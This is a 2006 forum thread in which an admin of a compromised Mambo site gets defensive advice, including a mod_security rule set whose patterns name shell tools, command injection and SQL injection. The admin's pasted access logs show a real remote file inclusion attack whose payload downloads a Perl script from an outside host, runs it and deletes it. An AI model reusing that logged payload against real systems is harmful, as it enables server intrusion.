Go Back   HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > ISPConfig 2 > General

Do you like HowtoForge? Please consider supporting us by becoming a subscriber.
Reply
 
Thread Tools Display Modes
  #11  
Old 16th July 2006, 13:34
Grizzly Grizzly is offline
Member
 
Join Date: Feb 2006
Posts: 41
Thanks: 0
Thanked 0 Times in 0 Posts
Default

This is after I blocked what you said before on the firewall and restarted the server, I have also blocked the ip's in .htaccess
Reply With Quote
Sponsored Links
  #12  
Old 16th July 2006, 13:39
Ben Ben is offline
Moderator
 
Join Date: Jul 2006
Posts: 1,029
Thanks: 7
Thanked 62 Times in 56 Posts
Default

for securing you could use mod_security for apache.
But be careful with that, so misconfigured mod_security causes e.g. phpMyAdmin to not work anymore, because it submits built queries via GET which is disallowed in some howtos for mod_security.

Next thing you can do is to disallow stuff like url_fopen wrappers in php.ini, because normally the admin should now if scripts need to get sth. from anywhere in the internet.
Reply With Quote
  #13  
Old 16th July 2006, 22:09
Grizzly Grizzly is offline
Member
 
Join Date: Feb 2006
Posts: 41
Thanks: 0
Thanked 0 Times in 0 Posts
Default

Any idea on where to find good posts on mod_security for suse10
Reply With Quote
  #14  
Old 17th July 2006, 08:11
Ben Ben is offline
Moderator
 
Join Date: Jul 2006
Posts: 1,029
Thanks: 7
Thanked 62 Times in 56 Posts
Default

On what? Installation or configuration?

That's a (undocumented) config example on mod_security
Quote:
<IfModule mod_security.c>
#Start Engine
SecFilterEngine On
SecFilterDefaultAction "deny,log,status:404"
SecFilterScanPOST On

#Valid URL-Encoding
SecFilterCheckURLEncoding On
SecFilterCheckCookieFormat On

#Unicode Encoding Check
SecFilterCheckUnicodeEncoding Off

SecFilterForceByteRange 1 255

#Logging
SecAuditEngine RelevantOnly
SecAuditLog /var/log/modsec_audit.log
SecFilterDebugLog /var/log/modesc_debug.log
SecFilterDebugLevel 0


SecServerSignature "."

#Enforce proper HTTP requests
#SecFilterSelective THE_REQUEST "!HTTP\/(0\.9|1\.0|1\.1)$"

#check for bad meta characters in User-Agent field
SecFilterSelective HTTP_USER_AGENT ".*\'"

#Require Content-Length to be provided with every POST request
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

#Don't accept chunked encodings
SecFilterSelective HTTP_Transfer-Encoding "chunked"

#must have a useragent string
SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

#Again, this is better protected by removing these functions in php.ini
SecFilterSelective ARGS "(system|exec|passthru|popen|shell_exec|proc_open| fopen|fwrite)\s*\("

#Prevent path traversal (..) attacks
SecFilter "\.\./"

#generic recursion signature
SecFilterSelective THE_REQUEST "\.\./\.\./"

#generic attack sig
SecFilterSelective THE_REQUEST "cd\x20*\;(cd|\;|echo|perl|python|rpm|yum|apt-get|emerge|lynx|links|mk dir|elinks|cmd|pwd|wget|id|uname|cvs|svn|(s|r)(cp| sh)|rexec|smbclient|t?ftp|ncftp|curl|te lnet|gcc|cc|g\+\+|\./)"

#generic filter to prevent SQL injection attacks
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|tr uncate|u pdate|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z |a-z|0-9|\*| |\,]"

#generic PHP remote file inclusion attack
SecFilter "\.php\?" chain
SecFilter "(http|https|ftp)\:/" chain
SecFilter "cmd=(cd|\;|perl|python|rpm|yum|apt-get|emerge|lynx|links|mkdir|elinks |cmd|pwd|wget|id|uname|cvs|svn|(s|r)(cp|sh)|rexec| smbclient|t?ftp|ncftp|curl|telnet|gcc |cc|g\+\+|\./)"

#generic sig for more bad PHP functions
SecFilterSelective THE_REQUEST "chr\(([0-9]{1,3})\)"
SecFilterSelective THE_REQUEST "chr\([0-9a-fA-Fx]+\)"

#SQL injection attacks
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"

#SQL injection in cookies
SecFilterSelective COOKIE_sessionid ".*(select|grant|delete|insert|drop|do|alter|repla ce|truncate|update|c reate|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*||\,]+[[:space:]]+(from|into|table |database|index|view)"
</IfModule>
That can be placed anywhere in you apache config... under debian it makes sense to store that file to mods-available and link it into mods-enabled on usage. Under Suse I actually (and I don't mind ) don't know the hundreds of files the config is split into and where to best put that...

Also you must load the module with sth. like
Quote:
LoadModule security_module /usr/lib/apache2/modules/mod_security.so
Do disable that stuff for e.g. phpMyAdmin
Quote:
<Directory /your/path/to/phpMyAdmin/>
<IfModule mod_security.c>
SecFilterEngine Off
</IfModule>
</Directory>
If you're not willing to apply that rules from above to _ALL_ your sites and to a whitelist like that stuff with phpMyAdmin, it makes sense to apply that filter only on some dirs....

More on Installation and configuration can be found here: http://www.modsecurity.org/documenta...tml-multipage/
Reply With Quote
  #15  
Old 17th July 2006, 15:12
falko falko is offline
Super Moderator
 
Join Date: Apr 2005
Location: Lüneburg, Germany
Posts: 41,711
Thanks: 1,899
Thanked 2,702 Times in 2,545 Posts
Default

Quote:
Originally Posted by Grizzly
Any idea on where to find good posts on mod_security for suse10
Also take a look here: http://www.howtoforge.com/apache_mod_security
__________________
Falko
--
Download the ISPConfig 3 Manual! | Check out the ISPConfig 3 Billing Module!

FB: http://www.facebook.com/howtoforge

nginx-Webhosting: Timme Hosting | Follow me on:
Reply With Quote
  #16  
Old 17th July 2006, 22:13
Grizzly Grizzly is offline
Member
 
Join Date: Feb 2006
Posts: 41
Thanks: 0
Thanked 0 Times in 0 Posts
Unhappy Attacks continue

I've now spent the last 48h reinstalling the entire server. I've done all the above mentioned, but when I check my logfiles I find the following in except for the mod_security bit. I've redone the websites the mambo sites are now blank joomla latest stable version sites untill I get time to redo them. The only .htaccess files I can find lie in the stats folders is this correct.
/var/log/httpd/ispconfig_access_log:

www.mydomain.com||||167||||82.192.65.106 - - [17/Jul/2006:21:23:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/antos/tool25.dat?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebtown.com/antos/a2.txt;perl%20a2.txt;rm%20-rf%20a2*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"

and in /var/log/apache2/access_log for the same time

82.192.65.106 - - [17/Jul/2006:21:23:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/antos/tool25.dat?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebtown.com/antos/a2.txt;perl%20a2.txt;rm%20-rf%20a2*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"
61.135.145.206 - - [17/Jul/2006:21:24:12 +0200] "GET / HTTP/1.1" 200 17330 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"

and in /var/log/apache2/error_log at the same time

[Mon Jul 17 21:23:03 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:23:03 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:24:12 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:24:12 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:21 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:21 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:31 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:31 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:32 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:32 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:43 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:43 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:44 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:44 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:46 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:46 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:47 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:47 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:48 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:48 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:49 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:49 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:52 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:52 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:53 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:53 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:58 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:58 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:02 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:02 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:06 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:06 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:07 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:07 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:12 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:12 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:15 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:31:15 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:34:46 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:34:46 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:35:06 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:35:06 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:43:37 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:43:37 2006] [error] an unknown filter was not added: PHP

is this a failed attempt or do I have reason to worry, I'm about to go out of my mind. Please help
Reply With Quote
  #17  
Old 17th July 2006, 22:20
TheRudy TheRudy is offline
Senior Member
 
Join Date: Dec 2005
Posts: 215
Thanks: 1
Thanked 7 Times in 5 Posts
Default

Attacks continue cause you are still using the same buggy script! I've told you already to remove it from public usage! That PHP error is nothing you have to be worried about. But please, disable this mambo site and the attacks will stop. Blocking 1 IP is kinda useless since they just change sites..

Again, REMOVE THE WEBSITE or update website with newer patch or something.. What version of Mambo cms are you using?
Reply With Quote
  #18  
Old 17th July 2006, 23:45
todvard todvard is offline
Member
 
Join Date: Aug 2005
Posts: 85
Thanks: 1
Thanked 6 Times in 5 Posts
Default

Just one thing to mention, it is a good practice to enable and configure firewall for outbound connections as well. If you had a good firewall script which allow to access http only to trusted sites, then you wouldn't have to worry about those attacks.
Reply With Quote
  #19  
Old 18th July 2006, 00:55
edge edge is offline
Moderator
 
Join Date: Dec 2005
Location: The Netherlands
Posts: 2,033
Thanks: 260
Thanked 145 Times in 127 Posts
Default

Quote:
Originally Posted by Grizzly
[Mon Jul 17 21:30:43 2006] [error] an unknown filter was not added: PHP
[Mon Jul 17 21:30:44 2006] [error] an unknown filter was not added: PHP
see: http://www.howtoforge.com/forums/sho...che2_php%22%5D
Reply With Quote
  #20  
Old 18th July 2006, 08:25
Ben Ben is offline
Moderator
 
Join Date: Jul 2006
Posts: 1,029
Thanks: 7
Thanked 62 Times in 56 Posts
 
Default

Quote:
Originally Posted by todvard
Just one thing to mention, it is a good practice to enable and configure firewall for outbound connections as well. If you had a good firewall script which allow to access http only to trusted sites, then you wouldn't have to worry about those attacks.
and don't forget to allow only some symten users for some connections....


next thing is disable "allow url fopen" in php.ini to prevent any script reading stuff from anywhere in the internet!
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
"unknown filter" growing apache log. wwparrish Installation/Configuration 6 1st September 2006 18:40
perfect setup suse 10 - phpmyadmin & mysql question reddog Server Operation 7 17th June 2006 12:59
2 domains, 1 site wadims Installation/Configuration 13 31st May 2006 00:21
Downgrade php5 to php4.4.2 llizards Installation/Configuration 4 13th March 2006 23:58
all my site go to /var/www/ Absolusteph Installation/Configuration 14 11th March 2006 21:27


All times are GMT +2. The time now is 17:16.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.